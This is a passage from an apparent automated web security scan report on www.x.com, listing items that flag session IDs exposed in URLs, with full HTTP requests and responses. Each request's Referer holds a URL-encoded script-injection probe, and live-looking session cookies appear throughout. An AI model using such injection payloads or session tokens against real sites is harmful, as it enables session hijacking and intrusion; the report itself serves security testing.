Request

GET /people/structuralartistry/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10206 t=1313157137208695
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.33. https://www.x.com/people/theatreus/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/theatreus/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/theatreus/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:03 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9054 t=1313158263705381
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.34. https://www.x.com/people/thomlizpa/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/thomlizpa/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/thomlizpa/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8367 t=1313157137320405
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.35. https://www.x.com/people/tifroz/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/tifroz/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/tifroz/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=12547 t=1313157143974667
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.36. https://www.x.com/people/tim_hunt/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/tim_hunt/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/tim_hunt/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7508 t=1313157137035182
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.37. https://www.x.com/people/timneu22/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/timneu22/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/timneu22/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:21 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11518 t=1313157142392525
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.38. https://www.x.com/people/vmchatt/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/vmchatt/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/vmchatt/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9494 t=1313157144350838
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.39. https://www.x.com/people/xavijr/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/xavijr/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/xavijr/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8711 t=1313157143991473
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.40. https://www.x.com/plugins/app-type-plugin/styles/app.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/app-type-plugin/styles/app.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/app-type-plugin/styles/app.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 16107
JP: D=316 t=1313157136338896
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

.jive-icon-app-sml {
background-image: url( ../images/app-12x12.gif);
background-position: 0 0;
}

.jive-icon-app-med {
background-image: url( ../images/app-16x16.gif);
background-posi
...[SNIP]...

3.41. https://www.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/borderless-widget-plugin/classes/borderless-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/borderless-widget-plugin/classes/borderless-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:18 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 488
JP: D=25771 t=1313157139008468
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.42. https://www.x.com/plugins/content-widgets/classes/community-widget.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/content-widgets/classes/community-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/content-widgets/classes/community-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 1257
JP: D=524 t=1313157136334441
Vary: User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.43. https://www.x.com/plugins/digg-style-voting/scripts/plugin.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/digg-style-voting/scripts/plugin.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/digg-style-voting/scripts/plugin.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:51 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 4235
JP: D=443 t=1313157136339069
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/engine.js" ></script>');
document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/interface/Clearv
...[SNIP]...

3.44. https://www.x.com/plugins/digg-style-voting/styles/plugin.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/digg-style-voting/styles/plugin.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/digg-style-voting/styles/plugin.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 4524
JP: D=324 t=1313157136644480
Vary: User-Agent
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive

.clearvote-container {
padding: 0;
overflow: hidden;
display: block;
float: right;
}

.clearvote-container .clearvote-table {
   border:0;
   border-collapse:collapse;
   float:non
...[SNIP]...

3.45. https://www.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/i18n-html-widget-plugin/classes/borderless-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 488
JP: D=415 t=1313157138225710
Vary: User-Agent
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.46. https://www.x.com/plugins/idea-type-plugin/resources/styles/idea.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/idea-type-plugin/resources/styles/idea.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/idea-type-plugin/resources/styles/idea.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 13894
JP: D=348 t=1313157136390261
Vary: User-Agent
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

body .jive-icon-idea-sml,
body .jive-icon-idea-med,
body .jive-icon-idea-big,
.voted-up .voted-arrow,
.voted-down .voted-arrow,
.vote-button {
   background-image: url(../images/j-ideas-sprites.png);
   _
...[SNIP]...

3.47. https://www.x.com/resources/images/status/statusicon-01.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/images/status/statusicon-01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/images/status/statusicon-01.gif;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:08 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:37:07 GMT
Cache-Control: max-age=60
Content-Type: image/gif
Vary: Accept-Encoding,User-Agent
JP: D=782 t=1313158269200189
Content-Length: 994
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive

...[SNIP]...

3.48. https://www.x.com/resources/scripts/fancyzoom/images/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/fancyzoom/images/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/fancyzoom/images/;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0closebox.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
